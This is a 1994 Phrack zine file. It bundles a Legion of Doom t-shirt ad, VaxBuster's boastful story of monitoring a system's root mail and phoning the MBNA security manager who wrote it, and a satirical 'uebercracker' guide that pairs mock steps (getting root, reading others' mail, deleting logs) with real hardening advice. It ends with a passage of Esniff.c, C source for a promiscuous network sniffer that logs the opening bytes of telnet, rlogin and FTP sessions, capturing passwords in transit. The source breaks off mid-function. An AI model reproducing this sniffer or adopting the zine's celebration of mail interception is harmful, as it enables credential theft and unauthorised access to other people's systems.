1506 lines
48 KiB
Plaintext
1506 lines
48 KiB
Plaintext
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Five, File 5 of 28
|
|||
|
|
|||
|
|
|||
|
// // /\ // ====
|
|||
|
// // //\\ // ====
|
|||
|
==== // // \\/ ====
|
|||
|
|
|||
|
/\ // // \\ // /=== ====
|
|||
|
//\\ // // // // \=\ ====
|
|||
|
// \\/ \\ // // ===/ ====
|
|||
|
|
|||
|
PART II
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
After a complete sellout at HoHo Con 1993 in Austin, TX this past
|
|||
|
December, the official Legion of Doom t-shirts are available
|
|||
|
once again. Join the net luminaries world-wide in owning one of
|
|||
|
these amazing shirts. Impress members of the opposite sex, increase
|
|||
|
your IQ, annoy system administrators, get raided by the government and
|
|||
|
lose your wardrobe!
|
|||
|
|
|||
|
Can a t-shirt really do all this? Of course it can!
|
|||
|
|
|||
|
--------------------------------------------------------------------------
|
|||
|
|
|||
|
"THE HACKER WAR -- LOD vs MOD"
|
|||
|
|
|||
|
This t-shirt chronicles the infamous "Hacker War" between rival
|
|||
|
groups The Legion of Doom and The Masters of Destruction. The front
|
|||
|
of the shirt displays a flight map of the various battle-sites
|
|||
|
hit by MOD and tracked by LOD. The back of the shirt
|
|||
|
has a detailed timeline of the key dates in the conflict, and
|
|||
|
a rather ironic quote from an MOD member.
|
|||
|
|
|||
|
(For a limited time, the original is back!)
|
|||
|
|
|||
|
"LEGION OF DOOM -- INTERNET WORLD TOUR"
|
|||
|
|
|||
|
The front of this classic shirt displays "Legion of Doom Internet World
|
|||
|
Tour" as well as a sword and telephone intersecting the planet
|
|||
|
earth, skull-and-crossbones style. The back displays the
|
|||
|
words "Hacking for Jesus" as well as a substantial list of "tour-stops"
|
|||
|
(internet sites) and a quote from Aleister Crowley.
|
|||
|
|
|||
|
--------------------------------------------------------------------------
|
|||
|
|
|||
|
All t-shirts are sized XL, and are 100% cotton.
|
|||
|
|
|||
|
Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for
|
|||
|
postage.
|
|||
|
|
|||
|
Send checks or money orders. Please, no credit cards, even if
|
|||
|
it's really your card.
|
|||
|
|
|||
|
|
|||
|
Name: __________________________________________________
|
|||
|
|
|||
|
Address: __________________________________________________
|
|||
|
|
|||
|
City, State, Zip: __________________________________________
|
|||
|
|
|||
|
|
|||
|
I want ____ "Hacker War" shirt(s)
|
|||
|
|
|||
|
I want ____ "Internet World Tour" shirt(s)
|
|||
|
|
|||
|
Enclosed is $______ for the total cost.
|
|||
|
|
|||
|
|
|||
|
Mail to: Chris Goggans
|
|||
|
603 W. 13th #1A-278
|
|||
|
Austin, TX 78701
|
|||
|
|
|||
|
|
|||
|
These T-shirts are sold only as a novelty items, and are in no way
|
|||
|
attempting to glorify computer crime.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
My dealing with MBNA - VaxBuster March 8, 1994
|
|||
|
----------------------------------------------
|
|||
|
|
|||
|
A friend approached me on Unphamiliar Terrorities with a pretty
|
|||
|
funny message. It turns out that a high-up executive in MBNA sent mail to
|
|||
|
root at system with public temporary directories, where an issue of Phrack
|
|||
|
44 was stored. My friend was monitoring root's mail, when he came across
|
|||
|
the following message.
|
|||
|
|
|||
|
To: root@<censored>
|
|||
|
Message-Id: <9401141340.aa09874@krusty.ee.udel.edu>
|
|||
|
Status: RO
|
|||
|
|
|||
|
Hello, The reason I am sending this message to you is an article
|
|||
|
that seems to have been on your system <censored>. I am an Information
|
|||
|
Security Assurance manager at the largest issuer of Goldcard Mastercard
|
|||
|
and Visa's in the world "MBNA America". The article seems to be a
|
|||
|
copy or issue of "Phrack Magazine" written by "Vaxbuster". It
|
|||
|
describes in detail how one could defraud credit card companies. I
|
|||
|
have talked with the CERT People in CMU to see if I could get a
|
|||
|
contact at your UNIV. There may be an additional 21 or so of these
|
|||
|
articles that I would love to get ahold of to protect my company.
|
|||
|
Please, if you can, send me your phone number so I can talk with you
|
|||
|
in more detail. My phone number at MBNA in Delaware is <censored>.
|
|||
|
|
|||
|
I can verify whatever information you may require over the phone or in
|
|||
|
writing.
|
|||
|
|
|||
|
Thank you for your help.
|
|||
|
|
|||
|
PS. We do not have a gateway or firewall to the Internet from here so
|
|||
|
the good People at UofDE allow me to have access from there systems.
|
|||
|
|
|||
|
MBNA America Bank, NA.
|
|||
|
400 Christiana Road
|
|||
|
Newark, DE 19713
|
|||
|
|
|||
|
Anyways, a couple people suggested that I call, and at first I
|
|||
|
thought that was a ridiculous idea, but I figured, what the hell, it may
|
|||
|
be funny. So NightStriker and I called him at his office one day in
|
|||
|
Mid-February. I was surprized he answered, and not a secretary,
|
|||
|
considering his position. I asked for him, and identified myself as
|
|||
|
VaxBuster. He shocked the hell out of me, because I really didn't
|
|||
|
expect him to immediately recognize my handle. He says, "Oh hey! how are
|
|||
|
you doing?" I told him I'd been monitoring mail, and came across his
|
|||
|
message. The main reason why I was calling was because he had mentioned
|
|||
|
he wanted 'more info' to protect his company. NTS and I were more than happy
|
|||
|
to answer any of his questions - but he said that he had obtained all of the
|
|||
|
issues. Although he said he had all of them, I highly doubt it, because he
|
|||
|
said he had like 20-some issues, and we told him there was 44. We chatted
|
|||
|
for about 15 more minutes, just about the reasons for publishing and not
|
|||
|
publishing such an article. He said "Some little kid is going to find this
|
|||
|
article and get his fingers burned" I could tell he was kind of pressured for
|
|||
|
time, so we kind of let it go at that, and he asked for our numbers to call us
|
|||
|
back. Oh, when I first called him, I didn't tell him I had a friend on the
|
|||
|
line, and he asked, "Is there an echo here?" hahahaha. Pretty funny. We
|
|||
|
told him NTS was there. So, when he asked for our numbers, we laughed out
|
|||
|
loud. I guess he doesn't really understand the secrecy we all so dearly
|
|||
|
cheerish. He said, "Well, I have caller id, so I have your numbers anyways"
|
|||
|
Bahahhahahaha. Yeah, right. We told him we were bouncing our call through
|
|||
|
a satellite in Japan. He thought we were joking. Guess he doesn't understand
|
|||
|
boxing huh? Maybe we should show him some of Tabas's files. heh. We told him
|
|||
|
we would call him back - which we haven't yet, but soon will. By the way, he
|
|||
|
complimented me on the quality of the article and how detailed it was. :)
|
|||
|
|
|||
|
Incidentally, for those of you who've lived in a cave, this is all
|
|||
|
in reference to an article of mine published in Phrack 44 called 'Safe and
|
|||
|
Easy Carding.'
|
|||
|
|
|||
|
And for all of you who didn't like my article - Fuck you.
|
|||
|
Greets out to all the eleets - Later.
|
|||
|
|
|||
|
VaxBuster '94
|
|||
|
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
A Guide to Internet Security: Becoming an Uebercracker
|
|||
|
and Becoming an UeberAdmin to stop Uebercrackers.
|
|||
|
|
|||
|
|
|||
|
Author: Christopher Klaus <cklaus@shadow.net>
|
|||
|
Date: December 5th, 1993.
|
|||
|
Version: 1.1
|
|||
|
|
|||
|
This is a paper will be broken into two parts, one showing 15 easy steps
|
|||
|
to becoming a uebercracker and the next part showing how to become a
|
|||
|
ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased
|
|||
|
by Dan Farmer to refer to some elite (cr/h)acker that is practically
|
|||
|
impossible to keep out of the networks.
|
|||
|
|
|||
|
Here's the steps to becoming a uebercracker.
|
|||
|
|
|||
|
Step 1. Relax and remain calm. Remember YOU are a Uebercracker.
|
|||
|
|
|||
|
Step 2. If you know a little Unix, you are way ahead of the crowd and skip
|
|||
|
past step 3.
|
|||
|
|
|||
|
Step 3. You may want to buy Unix manual or book to let you know what
|
|||
|
ls,cd,cat does.
|
|||
|
|
|||
|
Step 4. Read Usenet for the following groups: alt.irc, alt.security,
|
|||
|
comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background
|
|||
|
in uebercracker culture.
|
|||
|
|
|||
|
Step 5. Ask on alt.irc how to get and compile the latest IRC client and
|
|||
|
connect to IRC.
|
|||
|
|
|||
|
Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way
|
|||
|
there!)
|
|||
|
|
|||
|
Step 7. Now, sit on #hack and send messages to everyone in the channel
|
|||
|
saying "Hi, What's up?". Be obnoxious to anyone else that joins and asks
|
|||
|
questions like "Why cant I join #warez?"
|
|||
|
|
|||
|
Step 8. (Important Step) Send private messages to everyone asking for new
|
|||
|
bugs or holes. Here's a good pointer, look around your system for binary
|
|||
|
programs suid root (look in Unix manual from step 3 if confused). After
|
|||
|
finding a suid root binary, (ie. su, chfn, syslog), tell people you have a
|
|||
|
new bug in that program and you wrote a script for it. If they ask how it
|
|||
|
works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask
|
|||
|
them to trade for their get-root scripts.
|
|||
|
|
|||
|
Step 9. Make them send you some scripts before you send some garbage file
|
|||
|
(ie. a big core file). Tell them it is encrypted or it was messed up and
|
|||
|
you need to upload your script again.
|
|||
|
|
|||
|
Step 10. Spend a week grabbing all the scripts you can. (Don't forget to be
|
|||
|
obnoxious on #hack otherwise people will look down on you and not give you
|
|||
|
anything.)
|
|||
|
|
|||
|
Step 11. Hopefully you will now have at least one or two scripts that get
|
|||
|
you root on most Unixes. Grab root on your local machines, read your
|
|||
|
admin's mail, or even other user's mail, even rm log files and whatever
|
|||
|
temps you. (look in Unix manual from step 3 if confused).
|
|||
|
|
|||
|
Step 12. A good test for true uebercrackerness is to be able to fake mail.
|
|||
|
Ask other uebercrackers how to fake mail (because they have had to pass the
|
|||
|
same test). Email your admin how "layme" he is and how you got root and how
|
|||
|
you erased his files, and have it appear coming from satan@evil.com.
|
|||
|
|
|||
|
Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag
|
|||
|
about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are
|
|||
|
a uebercracker.)
|
|||
|
|
|||
|
Step 14. Wait a few months and have all your notes, etc ready in your room
|
|||
|
for when the FBI, Secret Service, and other law enforcement agencies
|
|||
|
confiscate your equipment. Call eff.org to complain how you were innocent
|
|||
|
and how you accidently gotten someone else's account and only looked
|
|||
|
because you were curious. (Whatever else that may help, throw at them.)
|
|||
|
|
|||
|
Step 15. Now for the true final supreme eliteness of all uebercrackers, you
|
|||
|
go back to #hack and brag about how you were busted. YOU are finally a
|
|||
|
true Uebercracker.
|
|||
|
|
|||
|
|
|||
|
Now the next part of the paper is top secret. Please only pass to trusted
|
|||
|
administrators and friends and even some trusted mailing lists, Usenet
|
|||
|
groups, etc. (Make sure no one who is NOT in the inner circle of security
|
|||
|
gets this.)
|
|||
|
|
|||
|
This is broken down on How to Become an UeberAdmin (otherwise know as a
|
|||
|
security expert) and How to stop Uebercrackers.
|
|||
|
|
|||
|
Step 1. Read Unix manual ( a good idea for admins ).
|
|||
|
|
|||
|
Step 2. Very Important. chmod 700 rdist; chmod 644 /etc/utmp. Install
|
|||
|
sendmail 8.6.4. You have probably stopped 60 percent of all Uebercrackers
|
|||
|
now. Rdist scripts is among the favorites for getting root by
|
|||
|
uebercrackers.
|
|||
|
|
|||
|
Step 3. Okay, maybe you want to actually secure your machine from the
|
|||
|
elite Uebercrackers who can break into any site on Internet.
|
|||
|
|
|||
|
Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing
|
|||
|
packets. (This only applies to advanced admins who have control of the
|
|||
|
router, but this will stop 90% of all uebercrackers from attempting your
|
|||
|
site.)
|
|||
|
|
|||
|
Step 5. Apply all CERT and vendor patches to all of your machines. You have
|
|||
|
just now killed 95% of all uebercrackers.
|
|||
|
|
|||
|
Step 6. Run a good password cracker to find open accounts and close them.
|
|||
|
Run tripwire after making sure your binaries are untouched. Run tcp_wrapper
|
|||
|
to find if a uebercracker is knocking on your machines. Run ISS to make
|
|||
|
sure that all your machines are reasonably secure as far as remote
|
|||
|
configuration (ie. your NFS exports and anon FTP site.)
|
|||
|
|
|||
|
Step 7. If you have done all of the following, you will have stopped 99%
|
|||
|
of all uebercrackers. Congrats! (Remember, You are the admin.)
|
|||
|
|
|||
|
Step 8. Now there is one percent of uebercrackers that have gained
|
|||
|
knowledge from reading some security expert's mail (probably gained access
|
|||
|
to his mail via NFS exports or the guest account. You know how it is, like
|
|||
|
the mechanic that always has a broken car, or the plumber that has the
|
|||
|
broken sink, the security expert usually has an open machine.)
|
|||
|
|
|||
|
Step 9. Here is the hard part is to try to convince these security experts
|
|||
|
that they are not so above the average citizen and that by now giving out
|
|||
|
their unknown (except for the uebercrackers) security bugs, it would be a
|
|||
|
service to Internet. They do not have to post it on Usenet, but share
|
|||
|
among many other trusted people and hopefully fixes will come about and
|
|||
|
new pressure will be applied to vendors to come out with patches.
|
|||
|
|
|||
|
Step 10. If you have gained the confidence of enough security experts,
|
|||
|
you will know be a looked up to as an elite security administrator that is
|
|||
|
able to stop most uebercrackers. The final true test for being a ueberadmin
|
|||
|
is to compile a IRC client, go onto #hack and log all the bragging and
|
|||
|
help catch the uebercrackers. If a uebercracker does get into your system,
|
|||
|
and he has used a new method you have never seen, you can probably tell
|
|||
|
your other security admins and get half of the replies like - "That bug
|
|||
|
been known for years, there just isn't any patches for it yet. Here's my
|
|||
|
fix." and the other half of the replies will be like - "Wow. That is very
|
|||
|
impressive. You have just moved up a big notch in my security circle."
|
|||
|
VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups
|
|||
|
mention anything about that security hole, Flame him for discussing it
|
|||
|
since it could bring down Internet and all Uebercrackers will now have it
|
|||
|
and the million other reasons to keep everything secret about security.
|
|||
|
|
|||
|
|
|||
|
Well, this paper has shown the finer details of security on Internet. It has
|
|||
|
shown both sides of the coin. Three points I would like to make that would
|
|||
|
probably clean up most of the security problems on Internet are as the
|
|||
|
following:
|
|||
|
|
|||
|
1. Vendors need to make security a little higher than zero in priority.
|
|||
|
If most vendors shipped their Unixes already secure with most known bugs
|
|||
|
that have been floating around since the Internet Worm (6 years ago) fixed
|
|||
|
and patched, then most uebercrackers would be stuck as new machines get
|
|||
|
added to Internet. (I believe Uebercracker is German for "lame copy-cat
|
|||
|
that can get root with 3 year old bugs.") An interesting note is that
|
|||
|
if you probably check the mail alias for "security@vendor.com", you will
|
|||
|
find it points to /dev/null. Maybe with enough mail, it will overfill
|
|||
|
/dev/null. (Look in manual if confused.)
|
|||
|
|
|||
|
2. Security experts giving up the attitude that they are above the normal
|
|||
|
Internet user and try to give out information that could lead to pressure
|
|||
|
by other admins to vendors to come out with fixes and patches. Most
|
|||
|
security experts probably don't realize how far their information has
|
|||
|
already spread.
|
|||
|
|
|||
|
3. And probably one of the more important points is just following the
|
|||
|
steps I have outlined for Stopping a Uebercracker.
|
|||
|
|
|||
|
|
|||
|
Resources for Security:
|
|||
|
Many security advisories are available from anonymous ftp cert.org.
|
|||
|
Ask archie to find tcp_wrapper, security programs. For more information
|
|||
|
about ISS (Internet Security Scanner), email cklaus@shadow.net.
|
|||
|
|
|||
|
|
|||
|
Acknowledgments:
|
|||
|
|
|||
|
Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott
|
|||
|
Miles, Scott Yelich, and Henri De Valois.
|
|||
|
|
|||
|
|
|||
|
Copyright:
|
|||
|
|
|||
|
This paper is Copyright 1993, 1994. Please distribute to only trusted
|
|||
|
people. If you modify, alter, disassemble, reassemble, re-engineer or have
|
|||
|
any suggestions or comments, please send them to:
|
|||
|
|
|||
|
cklaus@shadow.net
|
|||
|
|
|||
|
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
/* [JOIN THE POSSE!] */
|
|||
|
|
|||
|
/* Esniff.c */
|
|||
|
|
|||
|
#include <stdio.h>
|
|||
|
#include <ctype.h>
|
|||
|
#include <string.h>
|
|||
|
|
|||
|
#include <sys/time.h>
|
|||
|
#include <sys/file.h>
|
|||
|
#include <sys/stropts.h>
|
|||
|
#include <sys/signal.h>
|
|||
|
#include <sys/types.h>
|
|||
|
#include <sys/socket.h>
|
|||
|
#include <sys/ioctl.h>
|
|||
|
|
|||
|
#include <net/if.h>
|
|||
|
#include <net/nit_if.h>
|
|||
|
#include <net/nit_buf.h>
|
|||
|
#include <net/if_arp.h>
|
|||
|
|
|||
|
#include <netinet/in.h>
|
|||
|
#include <netinet/if_ether.h>
|
|||
|
#include <netinet/in_systm.h>
|
|||
|
#include <netinet/ip.h>
|
|||
|
#include <netinet/udp.h>
|
|||
|
#include <netinet/ip_var.h>
|
|||
|
#include <netinet/udp_var.h>
|
|||
|
#include <netinet/in_systm.h>
|
|||
|
#include <netinet/tcp.h>
|
|||
|
#include <netinet/ip_icmp.h>
|
|||
|
|
|||
|
#include <netdb.h>
|
|||
|
#include <arpa/inet.h>
|
|||
|
|
|||
|
#define ERR stderr
|
|||
|
|
|||
|
char *malloc();
|
|||
|
char *device,
|
|||
|
*ProgName,
|
|||
|
*LogName;
|
|||
|
FILE *LOG;
|
|||
|
int debug=0;
|
|||
|
|
|||
|
#define NIT_DEV "/dev/nit"
|
|||
|
#define CHUNKSIZE 4096 /* device buffer size */
|
|||
|
int if_fd = -1;
|
|||
|
int Packet[CHUNKSIZE+32];
|
|||
|
|
|||
|
void Pexit(err,msg)
|
|||
|
int err; char *msg;
|
|||
|
{ perror(msg);
|
|||
|
exit(err); }
|
|||
|
|
|||
|
void Zexit(err,msg)
|
|||
|
int err; char *msg;
|
|||
|
{ fprintf(ERR,msg);
|
|||
|
exit(err); }
|
|||
|
|
|||
|
#define IP ((struct ip *)Packet)
|
|||
|
#define IP_OFFSET (0x1FFF)
|
|||
|
#define SZETH (sizeof(struct ether_header))
|
|||
|
#define IPLEN (ntohs(ip->ip_len))
|
|||
|
#define IPHLEN (ip->ip_hl)
|
|||
|
#define TCPOFF (tcph->th_off)
|
|||
|
#define IPS (ip->ip_src)
|
|||
|
#define IPD (ip->ip_dst)
|
|||
|
#define TCPS (tcph->th_sport)
|
|||
|
#define TCPD (tcph->th_dport)
|
|||
|
#define IPeq(s,t) ((s).s_addr == (t).s_addr)
|
|||
|
|
|||
|
#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
|
|||
|
|
|||
|
#define MAXBUFLEN (128)
|
|||
|
time_t LastTIME = 0;
|
|||
|
|
|||
|
struct CREC {
|
|||
|
struct CREC *Next,
|
|||
|
*Last;
|
|||
|
time_t Time; /* start time */
|
|||
|
struct in_addr SRCip,
|
|||
|
DSTip;
|
|||
|
u_int SRCport, /* src/dst ports */
|
|||
|
DSTport;
|
|||
|
u_char Data[MAXBUFLEN+2]; /* important stuff :-) */
|
|||
|
u_int Length; /* current data length */
|
|||
|
u_int PKcnt; /* # pkts */
|
|||
|
u_long LASTseq;
|
|||
|
};
|
|||
|
|
|||
|
struct CREC *CLroot = NULL;
|
|||
|
|
|||
|
char *Symaddr(ip)
|
|||
|
register struct in_addr ip;
|
|||
|
{ register struct hostent *he =
|
|||
|
gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
|
|||
|
|
|||
|
return( (he)?(he->h_name):(inet_ntoa(ip)) );
|
|||
|
}
|
|||
|
|
|||
|
char *TCPflags(flgs)
|
|||
|
register u_char flgs;
|
|||
|
{ static char iobuf[8];
|
|||
|
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
|
|||
|
|
|||
|
SFL(0,TH_FIN, 'F');
|
|||
|
SFL(1,TH_SYN, 'S');
|
|||
|
SFL(2,TH_RST, 'R');
|
|||
|
SFL(3,TH_PUSH,'P');
|
|||
|
SFL(4,TH_ACK, 'A');
|
|||
|
SFL(5,TH_URG, 'U');
|
|||
|
iobuf[6]=0;
|
|||
|
return(iobuf);
|
|||
|
}
|
|||
|
|
|||
|
char *SERVp(port)
|
|||
|
register u_int port;
|
|||
|
{ static char buf[10];
|
|||
|
register char *p;
|
|||
|
|
|||
|
switch(port) {
|
|||
|
case IPPORT_LOGINSERVER: p="rlogin"; break;
|
|||
|
case IPPORT_TELNET: p="telnet"; break;
|
|||
|
case IPPORT_SMTP: p="smtp"; break;
|
|||
|
case IPPORT_FTP: p="ftp"; break;
|
|||
|
default: sprintf(buf,"%u",port); p=buf; break;
|
|||
|
}
|
|||
|
return(p);
|
|||
|
}
|
|||
|
|
|||
|
char *Ptm(t)
|
|||
|
register time_t *t;
|
|||
|
{ register char *p = ctime(t);
|
|||
|
p[strlen(p)-6]=0; /* strip " YYYY\n" */
|
|||
|
return(p);
|
|||
|
}
|
|||
|
|
|||
|
char *NOWtm()
|
|||
|
{ time_t tm;
|
|||
|
time(&tm);
|
|||
|
return( Ptm(&tm) );
|
|||
|
}
|
|||
|
|
|||
|
#define MAX(a,b) (((a)>(b))?(a):(b))
|
|||
|
#define MIN(a,b) (((a)<(b))?(a):(b))
|
|||
|
|
|||
|
/* add an item */
|
|||
|
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
|
|||
|
register struct CREC *CLtmp = \
|
|||
|
(struct CREC *)malloc(sizeof(struct CREC)); \
|
|||
|
time( &(CLtmp->Time) ); \
|
|||
|
CLtmp->SRCip.s_addr = SIP.s_addr; \
|
|||
|
CLtmp->DSTip.s_addr = DIP.s_addr; \
|
|||
|
CLtmp->SRCport = SPORT; \
|
|||
|
CLtmp->DSTport = DPORT; \
|
|||
|
CLtmp->Length = MIN(LEN,MAXBUFLEN); \
|
|||
|
bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
|
|||
|
CLtmp->PKcnt = 1; \
|
|||
|
CLtmp->Next = CLroot; \
|
|||
|
CLtmp->Last = NULL; \
|
|||
|
CLroot = CLtmp; \
|
|||
|
}
|
|||
|
|
|||
|
register struct CREC *GET_NODE(Sip,SP,Dip,DP)
|
|||
|
register struct in_addr Sip,Dip;
|
|||
|
register u_int SP,DP;
|
|||
|
{ register struct CREC *CLr = CLroot;
|
|||
|
|
|||
|
while(CLr != NULL) {
|
|||
|
if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
|
|||
|
IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
|
|||
|
break;
|
|||
|
CLr = CLr->Next;
|
|||
|
}
|
|||
|
return(CLr);
|
|||
|
}
|
|||
|
|
|||
|
#define ADDDATA_NODE(CL,DATA,LEN) { \
|
|||
|
bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
|
|||
|
CL->Length += LEN; \
|
|||
|
}
|
|||
|
|
|||
|
#define PR_DATA(dp,ln) { \
|
|||
|
register u_char lastc=0; \
|
|||
|
while(ln-- >0) { \
|
|||
|
if(*dp < 32) { \
|
|||
|
switch(*dp) { \
|
|||
|
case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
|
|||
|
break; \
|
|||
|
case '\r': \
|
|||
|
case '\n': fprintf(LOG,"\n : "); \
|
|||
|
break; \
|
|||
|
default : fprintf(LOG,"^%c", (*dp + 64)); \
|
|||
|
break; \
|
|||
|
} \
|
|||
|
} else { \
|
|||
|
if(isprint(*dp)) fputc(*dp,LOG); \
|
|||
|
else fprintf(LOG,"(%d)",*dp); \
|
|||
|
} \
|
|||
|
lastc = *dp++; \
|
|||
|
} \
|
|||
|
fflush(LOG); \
|
|||
|
}
|
|||
|
|
|||
|
void END_NODE(CLe,d,dl,msg)
|
|||
|
register struct CREC *CLe;
|
|||
|
register u_char *d;
|
|||
|
register int dl;
|
|||
|
register char *msg;
|
|||
|
{
|
|||
|
fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
|
|||
|
fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
|
|||
|
fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
|
|||
|
fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
|
|||
|
NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
|
|||
|
fprintf(LOG," DATA: ");
|
|||
|
{ register u_int i = CLe->Length;
|
|||
|
register u_char *p = CLe->Data;
|
|||
|
PR_DATA(p,i);
|
|||
|
PR_DATA(d,dl);
|
|||
|
}
|
|||
|
|
|||
|
fprintf(LOG,"\n-- \n");
|
|||
|
fflush(LOG);
|
|||
|
|
|||
|
if(CLe->Next != NULL)
|
|||
|
CLe->Next->Last = CLe->Last;
|
|||
|
if(CLe->Last != NULL)
|
|||
|
CLe->Last->Next = CLe->Next;
|
|||
|
else
|
|||
|
CLroot = CLe->Next;
|
|||
|
free(CLe);
|
|||
|
}
|
|||
|
|
|||
|
/* 30 mins (x 60 seconds) */
|
|||
|
#define IDLE_TIMEOUT 1800
|
|||
|
#define IDLE_NODE() { \
|
|||
|
time_t tm; \
|
|||
|
time(&tm); \
|
|||
|
if(LastTIME<tm) { \
|
|||
|
register struct CREC *CLe,*CLt = CLroot; \
|
|||
|
LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
|
|||
|
while(CLe=CLt) { \
|
|||
|
CLt=CLe->Next; \
|
|||
|
if(CLe->Time <tm) \
|
|||
|
END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
|
|||
|
} \
|
|||
|
} \
|
|||
|
}
|
|||
|
|
|||
|
void filter(cp, pktlen)
|
|||
|
register char *cp;
|
|||
|
register u_int pktlen;
|
|||
|
{
|
|||
|
register struct ip *ip;
|
|||
|
register struct tcphdr *tcph;
|
|||
|
|
|||
|
{ register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
|
|||
|
|
|||
|
if(EtherType < 0x600) {
|
|||
|
EtherType = *(u_short *)(cp + SZETH + 6);
|
|||
|
cp+=8; pktlen-=8;
|
|||
|
}
|
|||
|
|
|||
|
if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
|
|||
|
return;
|
|||
|
}
|
|||
|
|
|||
|
/* ugh, gotta do an alignment :-( */
|
|||
|
bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
|
|||
|
|
|||
|
ip = (struct ip *)Packet;
|
|||
|
if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
|
|||
|
return;
|
|||
|
tcph = (struct tcphdr *)(Packet + IPHLEN);
|
|||
|
|
|||
|
if(!( (TCPD == IPPORT_TELNET) ||
|
|||
|
(TCPD == IPPORT_LOGINSERVER) ||
|
|||
|
(TCPD == IPPORT_FTP)
|
|||
|
)) return;
|
|||
|
|
|||
|
{ register struct CREC *CLm;
|
|||
|
register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
|
|||
|
register u_char *p = (u_char *)Packet;
|
|||
|
|
|||
|
p += ((IPHLEN * 4) + (TCPOFF * 4));
|
|||
|
|
|||
|
if(debug) {
|
|||
|
fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
|
|||
|
fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
|
|||
|
fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
|
|||
|
}
|
|||
|
|
|||
|
if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
|
|||
|
|
|||
|
CLm->PKcnt++;
|
|||
|
|
|||
|
if(length>0)
|
|||
|
if( (CLm->Length + length) < MAXBUFLEN ) {
|
|||
|
ADDDATA_NODE( CLm, p,length);
|
|||
|
} else {
|
|||
|
END_NODE( CLm, p,length, "DATA LIMIT");
|
|||
|
}
|
|||
|
|
|||
|
if(TCPFL(TH_FIN|TH_RST)) {
|
|||
|
END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
|
|||
|
}
|
|||
|
|
|||
|
} else {
|
|||
|
|
|||
|
if(TCPFL(TH_SYN)) {
|
|||
|
ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
IDLE_NODE();
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
/* signal handler
|
|||
|
*/
|
|||
|
void death()
|
|||
|
{ register struct CREC *CLe;
|
|||
|
|
|||
|
while(CLe=CLroot)
|
|||
|
END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
|
|||
|
|
|||
|
fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
|
|||
|
fflush(LOG);
|
|||
|
if(LOG != stdout)
|
|||
|
fclose(LOG);
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
|
|||
|
/* opens network interface, performs ioctls and reads from it,
|
|||
|
* passing data to filter function
|
|||
|
*/
|
|||
|
void do_it()
|
|||
|
{
|
|||
|
int cc;
|
|||
|
char *buf;
|
|||
|
u_short sp_ts_len;
|
|||
|
|
|||
|
if(!(buf=malloc(CHUNKSIZE)))
|
|||
|
Pexit(1,"Eth: malloc");
|
|||
|
|
|||
|
/* this /dev/nit initialization code pinched from etherfind */
|
|||
|
{
|
|||
|
struct strioctl si;
|
|||
|
struct ifreq ifr;
|
|||
|
struct timeval timeout;
|
|||
|
u_int chunksize = CHUNKSIZE;
|
|||
|
u_long if_flags = NI_PROMISC;
|
|||
|
|
|||
|
if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
|
|||
|
Pexit(1,"Eth: nit open");
|
|||
|
|
|||
|
if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
|
|||
|
Pexit(1,"Eth: ioctl (I_SRDOPT)");
|
|||
|
|
|||
|
si.ic_timout = INFTIM;
|
|||
|
|
|||
|
if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
|
|||
|
Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
|
|||
|
|
|||
|
timeout.tv_sec = 1;
|
|||
|
timeout.tv_usec = 0;
|
|||
|
si.ic_cmd = NIOCSTIME;
|
|||
|
